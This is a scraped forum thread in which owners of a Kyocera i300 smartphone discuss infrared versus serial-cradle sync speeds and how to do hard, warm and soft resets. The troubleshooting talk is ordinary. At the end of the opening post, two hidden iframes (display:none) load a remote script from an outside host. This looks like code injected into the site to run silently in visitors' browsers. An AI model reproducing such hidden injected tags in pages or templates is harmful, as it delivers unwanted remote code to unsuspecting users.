+ Reply to Thread

Thread: IR Speed?

IR Speed?

What kind of IR does the i300 have? SIR or FIR?

My laptop supports both and FIR supposedly has speeds of up to 4 Megs so I think the IP sync would at least be as fast as the serial cradle sync.

From the spped, I guess its SIR because after a hard reset, syncing with the cradle takes forever and syncing with the IR takes forever and a day. Anyone know how to speed it up or if it's even possible?

Also, how can I find out how fast my sync's are?

The IR sync works great for normal syncs but the hard resets are a drag.

thanks
    tom<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

what are you guys doing to make your phones do a hard reset???

1.Hold the display power button.

2.Press the reset button.

3.Release reset button.

4.Release display button.

Administrator

Arrow

hehee.... :o

no MJ, my meaning is what are these folks doing to have to do a hard reset? caphice? i dont endure hard rssets, but some folks seem to have them all the time, so my meaning is why so many people have to do hard resets...

make sense now? :p

Gotcha. See your point now.

Actually, both the serial and the IR are maxed at 115k. By default, serial should be slower as it defaults to 56k (can be updated to 115k)
    -mark

hard resets..

When I got my i300 I simply transferred all my apps from my palm Vx so I must have transferred some apps that don't like it.

What stinks is that when I do something that requires a hard reset, it makes everything inaccessible (including the phone). It would be nice if I could do a soft reset but simply not start the same app, but when I do a soft reset the i300 starts up at the screen saying I need to reset

i300 connection to PC speed

so in theory, the IR should be the same speed as the serial cable?

Has anyone actually had the IR be the same speed?

Also, is the i300 limited to the slower speed of serial or if some company came out with a USB hotsync cable would we see USB hotsync speeds?

thanks
    tom

Administrator

Arrow

It would be nice if I could do a soft reset but simply not start the same app, but when I do a soft reset the i300 starts up at the screen saying I need to reset
    you should try doing a WARM reset. this will deactivate any system hacks or patches that got you there in the first place. also, let me mention that i hope you are using the desktop 4.0.1.

Re: hard resets..

Originally posted by tomv
    What stinks is that when I do something that requires a hard reset, it makes everything inaccessible (including the phone).
    Tom:
    I have only had to do a couple of hard resets, but my phone worked after the hard reset. I did not have to sync in order to use the phone. I know, because it was one of those times when I was away from my laptop. The phone info much be stored someplace else in the i300 because a hard reset does not clear it out.
    Carl

Re: Re: hard resets..

Originally posted by CarlGalgano

Tom:
    I have only had to do a couple of hard resets, but my phone worked after the hard reset. I did not have to sync in order to use the phone. I know, because it was one of those times when I was away from my laptop. The phone info much be stored someplace else in the i300 because a hard reset does not clear it out.
    Something else to add to the "odd" list - I have done more than on hard reset in the past and I did lose my speed/ voice dials......
    Cliff

Cliff:
    I never said I did not lose my speed and voice dials.... they are history. I stopped setting up voice dial because it is too much of a pain in the butt to do every time you have to hard reset. (seems like I hard resetted my 6035 a lot more than the i300). But the phone still will function as a phone. At lease if you are out and need to hard reset you can still make a call.
    Carl

Administrator

Arrow

I have only had to do a couple of hard resets, but my phone worked after the hard reset. I did not have to sync in order to use the phone.
    correct. once you do a cold reset properly, the phone functions just as if you took it out of the box, sans your user installed stuff..

Originally posted by CarlGalgano
    Cliff:
    I never said I did not lose my speed and voice dials.... they are history. I stopped setting up voice dial because it is too much of a pain in the butt to do every time you have to hard reset. (seems like I hard resetted my 6035 a lot more than the i300). But the phone still will function as a phone. At lease if you are out and need to hard reset you can still make a call.
    Got it - misunderstood what you meant by phone info.....
    Cliff

So does anyone have an answer to original post?

I too find the IR sync to be slow and am thinking about buying the sync cable. Apparently, they should be the same speed. This is definitely not the case for me. Do I have something set wrong?